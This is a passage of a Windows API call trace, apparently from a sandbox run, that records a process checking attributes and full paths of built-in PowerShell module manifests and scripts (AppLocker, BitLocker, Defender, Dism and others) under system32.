	[0049.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368)) returned 1
	[0049.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b
	[0049.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1
	[0049.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41
	[0049.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352)) returned 1
	[0049.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\.\\AssignedAccess.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psm1", lpFilePart=0x0) returned 0x55
	[0049.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69)) returned 1
	[0049.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55
	[0049.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198)) returned 1
	[0049.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1", lpFilePart=0x0) returned 0x4b
	[0049.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564)) returned 1
	[0049.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b
	[0049.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644)) returned 1
	[0049.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51
	[0049.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c)) returned 1
	[0049.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f
	[0049.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699)) returned 1
	[0049.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d
	[0049.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c)) returned 1
	[0049.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49
	[0049.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544)) returned 1
	[0049.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71
	[0049.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436)) returned 1
	[0049.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1", lpFilePart=0x0) returned 0x41
	[0049.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7)) returned 1
	[0049.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41
	[0049.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817)) returned 1
	[0049.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b
	[0049.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d)) returned 1
	[0049.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65
	[0049.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc)) returned 1
	[0049.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53
	[0049.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397)) returned 1
	[0049.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43
	[0049.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3)) returned 1
	[0049.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f
	[0049.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209)) returned 1
	[0049.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d
	[0049.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba)) returned 1
	[0049.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47
	[0049.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e)) returned 1
	[0049.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43
	[0049.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.080] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006)) returned 1
	[0049.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
